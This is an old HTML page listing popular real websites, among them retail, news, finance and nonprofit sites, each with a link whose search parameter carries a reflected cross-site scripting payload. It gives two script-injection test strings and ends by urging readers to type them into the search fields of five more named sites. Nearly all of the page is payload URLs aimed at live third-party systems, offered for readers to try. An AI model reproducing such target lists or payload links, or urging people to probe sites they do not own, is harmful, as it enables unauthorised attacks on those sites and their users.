This is a huge list of many popular web sites that are susceptible to cross site scripting attacks with links to examples.
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>RESEARCH ON XSS VULNERABILITIES</title>
</head>
<body>
<h2><u>XSS VULNERABILITIES STILL IN MANY INTERNATIONAL AND IMPORTANT SITES</u></h2>
<h3><font color="#FF0000">Author:</font> SkyOut <font color="#FF0000">Date:</font> 18.July 2006 <font color="#FF0000">Site:</font> www.eof-project.net</h3>
<p>Today I began searching around for XSS flaws; I searched for standard errors in
several websites while handling script inputs. As expected, I found more and more
websites being vulnerable to this type of attack, but to my surprise even very
popular sites are vulnerable to this standard vulnerability!</p>
<p>Here you have the complete list of all sites I found in only a few hours:</p>
<p><b>I just used those two scripts to check the vulnerability in input fields:</b></p>
<p><b>1)</b> &lt; script &gt; alert ( 31337 ) &lt; / script &gt;</p>
<p><b>2)</b> &lt; script &gt; alert ( " XSS " ) &lt; / script &gt;</p>
<hr>
<ul>
<li> polizei.hessen.de <a href="http://www.polizei.hessen.de/internetzentral/broker?uTem=3b130c53-9286-7cf3-362d-61611142c388&class=net.icteam.cms.utils.search.IndexManager%3Bcurrentsize%3D1%3Bpagesize%3D10%3Bcms%3Dinternet&uMenSearch=00080ee1-825a-f6f8-6373-a91bbcb63046&class_text=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=3&y=2" target="_blank">[XSS]</a></li>
<li> arte-tv.com <a href="http://www.arte-tv.com/de/search__results/4996,templateId=noncache.html?searchString=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E" target="_blank">[XSS]</a></li>
<li> sport.ard.de <a href="http://sport.ard.de/sp/komponente/suchen/index.jhtml?q=%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E&x=0&y=0" target="_blank">[XSS]</a></li>
<li> suchnase.de <a href="http://www.suchnase.de/cgi-bin/search.cgi?query=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&search.x=0&search.y=0" target="_blank">[XSS]</a></li>
<li> killsometime.com <a href="http://www.killsometime.com/search/search.asp?Query=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&Submit=Search" target="_blank">[XSS]</a></li>
<li> pangora.n24.de <a href="http://pangora.n24.de/query.html?qu=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E" target="_blank">[XSS]</a></li>
<li> n-tv.de <a href="http://n-tv.de/472.html?query=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&m=n" target="_blank">[XSS]</a></li>
<li> walmartstores.com <a href="http://walmartstores.com/GlobalWMStoresWeb/search.do?subcatid=316&simplesearchfor=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=0&y=0" target="_blank">[XSS]</a></li>
<li> directory.fsf.org <a href="http://directory.fsf.org/search/fsd-search.py?q=%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E" target="_blank">[XSS]</a></li>
<li> hr-online.de <a href="http://www.hr-online.de/website/suche/home/index.jsp?posted=true&mode=2&q=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=0&y=0" target="_blank">[XSS]</a></li>
<li>pcworld.co.uk <a href="http://www.pcworld.co.uk/martprd/store/pcw_page.jsp?BV_SessionID=@@@@1041303741.1153247930@@@@&BV_EngineID=cceladdigdeifeicflgceggdhhmdgml.0&page=SimpleSearchProducts&low_bound=0&up_bound=0&criterion=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E&AtimeStamp=3330686849" target="_blank">[XSS]</a></li>
<li> pbs.org <a href="http://www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&btnG.x=0&btnG.y=0&neighborhood=none" target="_blank">[XSS]</a></li>
<li> online.wsj.com <a href="http://online.wsj.com/public/quotes/main.html?symbol_or_name=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=12&y=10&sym_name_switch=name" target="_blank">[XSS]</a></li>
<li> npr.org <a href="http://www.npr.org/search.php?text=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E" target="_blank">[XSS]</a></li>
<li> weather.com <a href="http://www.weather.com/search/enhanced?whatprefs=&what=WeatherLocalUndeclared&lswe=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&lswa=WeatherLocalUndeclared&from=whatwhere&where=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=0&y=0" target="_blank">[XSS]</a></li>
<li> mut.de <a href="http://www.mut.de/main/main.asp?SID=%7B1E81CCA7-3990-4309-B530-38374563CA4F%7D&TOKEN=%7B9BCA61EA-C95E-4427-8B0F-46DCA3B0BCA0%7D&quicksearch=%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E&QuickSearchCombo=home&TitelWieAutor=TRUE&Page=home%2Fbooklist&GO.x=0&GO.y=0" target="_blank">[XSS]</a></li>
<li> mitp.de <a href="http://mitp.de/vmi/mitp/suche?senden=1&suThema=alle&suSchlagwort=%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E" target="_blank">[XSS]</a></li>
<li> americanexpress.com <a href="http://search.americanexpress.com/amex/?q=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&site=amerexpress&client=amerexpress&output=amerexpress&restrict=US" target="_blank">[XSS]</a></li>
<li> netscape.com <a href="http://channels.netscape.com/pf/lookup.jsp?issuetype=1005&nameorts=1&LookupValue=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E" target="_blank">[XSS]</a></li>
<li> thestreet.com <a href="http://tools.thestreet.com/tsc/quotes.html?pg=qcn&symb=%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E&x=0&y=0" target="_blank">[XSS]</a></li>
<li> de.atari.com <a href="http://de.atari.com/index.php?pg=search&search=%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E" target="_blank">[XSS]</a></li>
<li> ati.com <a href="http://search.ati.com/nasearch.asp?Query=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&go.x=0&go.y=0&DefaultLanguage=16&Catalog=NASite&rdoCatalog=NASite&Start=&Total=&Stat=New" target="_blank">[XSS]</a></li>
<li> winamp.com <a href="http://winamp.com/videos/search.php?q=%3Cscript%3Ealert%2831337%29%3C%2Fscript%3E" target="_blank">[XSS]</a></li>
</ul>
<hr>
<p><b>And now it's up to you ;) Go to the following sites and type the XSS examples from above into the search field =)</b></p>
<p><b>(without the whitespaces of course...)</b></p>
<ul>
<li> evite.com <a href="http://evite.com/" target="_blank">[LINK]</a></li>
<li> knuddels.de <a href="http://www2.knuddels.de/dprint/static/de_pwd.html" target="_blank">[LINK]</a></li>
<li> gutenberg-gym.de <a href="http://gutenberg-gym.de/element.php?name=Search" target="_blank">[LINK]</a></li>
<li> greenpeace.org.uk <a href="http://greenpeace.org.uk/" target="_blank">[LINK]</a></li>
<li> hakin9.org <a href="http://en.hakin9.org/" target="_blank">[LINK]</a></li>
</ul>
<p><b><font color="#FF0000">FEEDBACK: vx.sky.out [at] gmail [dot] com</font></b></p>
</body>
</html>